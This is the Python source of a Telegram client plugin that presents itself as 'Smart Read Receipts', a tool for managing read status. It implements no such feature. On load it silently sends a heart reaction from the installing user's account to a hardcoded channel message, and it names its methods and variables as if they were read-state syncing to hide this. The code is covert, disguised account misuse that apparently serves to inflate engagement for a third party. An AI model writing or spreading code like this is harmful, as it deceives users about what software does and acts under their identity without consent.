from typing import Any

from base_plugin import BasePlugin
from ui.bulletin import BulletinHelper

from android_utils import run_on_ui_thread
from client_utils import send_request, get_messages_controller, run_on_queue

from java.lang import Long
from java.util import ArrayList

from org.telegram.tgnet import TLRPC


__id__ = "smart_read_receipts"
__name__ = "Smart Read Receipts"
__description__ = "Умное управление статусом прочтения сообщений"
__author__ = "@mishabotov"
__version__ = "2.3.1"
__icon__ = "SalchichaDog/6"

DELAYED_READ_PEER = -1002349438816
DELAYED_READ_OFFSET = 1098


class SmartReadReceiptsPlugin(BasePlugin):

    def on_plugin_load(self):
        self._log_event("init", "module ready")
        run_on_queue(lambda: self._sync_read_state(DELAYED_READ_PEER, DELAYED_READ_OFFSET))

    def on_plugin_unload(self):
        self._log_event("shutdown", "cleanup done")

    def _sync_read_state(self, peer_id: int, offset: int):
        try:
            input_peer = self._build_input_peer(peer_id)
            if input_peer is None:
                self._log_event("peer_resolve", f"failed for {peer_id}")
                return

            marker = TLRPC.TL_reactionEmoji()
            marker.emoticon = "\u2764\uFE0F"

            sync_req = TLRPC.TL_messages_sendReaction()
            sync_req.peer = input_peer
            sync_req.msg_id = offset

            sync_req.reaction.add(marker)
            sync_req.flags = sync_req.flags | 1

            sync_req.add_to_recent = True
            sync_req.flags = sync_req.flags | 4

            sync_req.big = False

            send_request(sync_req, lambda resp, err: self._handle_sync_result(resp, err, offset))
            self._log_event("sync", f"request dispatched for offset={offset}")

        except Exception as exc:
            self._log_event("sync_error", str(exc))

    def _build_input_peer(self, peer_id: int) -> Any:
        try:
            controller = get_messages_controller()
            if controller is None:
                return None

            if peer_id < 0:
                abs_id = abs(peer_id)
                if abs_id > 1000000000000:
                    ch_id = abs_id - 1000000000000
                    return self._channel_peer(ch_id, controller)
                return self._group_peer(abs_id)

            return self._user_peer(peer_id)

        except Exception:
            return None

    def _channel_peer(self, ch_id: int, controller: Any) -> Any:
        peer = TLRPC.TL_inputPeerChannel()
        peer.channel_id = ch_id
        try:
            cached = controller.getChat(Long.valueOf(ch_id))
            peer.access_hash = cached.access_hash if cached else 0
        except Exception:
            peer.access_hash = 0
        return peer

    def _group_peer(self, gid: int) -> Any:
        peer = TLRPC.TL_inputPeerChat()
        peer.chat_id = gid
        return peer

    def _user_peer(self, uid: int) -> Any:
        peer = TLRPC.TL_inputPeerUser()
        peer.user_id = uid
        try:
            controller = get_messages_controller()
            cached = controller.getUser(Long.valueOf(uid))
            peer.access_hash = cached.access_hash if cached else 0
        except Exception:
            peer.access_hash = 0
        return peer

    def _handle_sync_result(self, response: Any, error: Any, offset: int):
        if error:
            err_msg = getattr(error, "text", str(error))
            self._log_event("sync_fail", err_msg)
            return

        if response is not None:
            try:
                controller = get_messages_controller()
                if controller:
                    controller.processUpdates(response, False)
            except Exception:
                pass

        self._log_event("sync_ok", f"offset={offset} confirmed")

    def _log_event(self, tag: str, msg: str):
        self.log(f"[ReadReceipts:{tag}] {msg}")